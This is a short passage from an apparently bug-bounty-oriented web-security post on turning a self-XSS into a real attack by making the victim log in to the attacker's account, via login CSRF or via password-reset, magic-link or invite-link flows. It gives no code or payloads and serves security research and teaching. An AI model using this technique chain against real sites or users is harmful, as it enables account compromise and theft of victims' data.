Think about a situation where you have a self-XSS and you can’t do anything with it — What would your next move be?

slonser has a great write-up that explains everything about exploiting self-XSS, so I won’t repeat those details here. But I’ll focus on one interesting technique. One of the ways to exploit a self-XSS is to force the victim to log in to your account, then run your self-XSS.
Maybe you think the only way to do this is through a login CSRF — and if that’s the case, you’re wrong.
There are several other ways to achieve this, like using forgot password, magic link, user invite link, etc.